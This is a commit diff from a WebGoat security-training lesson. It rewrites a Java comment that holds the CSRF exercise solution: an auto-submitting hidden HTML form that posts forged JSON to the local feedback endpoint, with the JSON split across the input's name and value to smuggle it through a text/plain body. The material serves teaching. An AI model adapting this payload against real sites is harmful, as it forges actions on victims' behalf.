docs(CSRFFeedback.java): fixed one invalid solution about CSRF attack (#2010)
Co-authored-by: HackHuang <GoogTech@outlook.com> Co-authored-by: HackHuang <hi@goog.tech>
This commit is contained in:
		| @ -115,10 +115,13 @@ public class CSRFFeedback implements AssignmentEndpoint { | ||||
|     return false; | ||||
|   } | ||||
|  | ||||
|   /** | ||||
|    * Solution <form name="attack" enctype="text/plain" | ||||
|    * action="http://localhost:8080/WebGoat/csrf/feedback/message" METHOD="POST"> <input | ||||
|    * type="hidden" name='{"name": "Test", "email": "test1233@dfssdf.de", "subject": "service", | ||||
|    * "message":"dsaffd"}'> </form> <script>document.attack.submit();</script> | ||||
|   /* | ||||
|    * Solution: | ||||
|    * <form name="attack" enctype="text/plain" action="http://localhost:8080/WebGoat/csrf/feedback/message" METHOD="POST"> | ||||
|    *    <!-- Construct valid JSON data: {name: "HackHuang", email: "email@example.com", subject: "suggestions", message: "Fixed the invalid solution="} --> | ||||
|    *    <input type="hidden" name='{"name": "HackHuang", "email": "email@example.com", "subject": "suggestions","message":"Fixed the invalid solution', value='"}'> | ||||
|    * </form> | ||||
|    * <script>document.attack.submit();</script> | ||||
|    */ | ||||
|  | ||||
| } | ||||
|  | ||||
		Reference in New Issue
	
	Block a user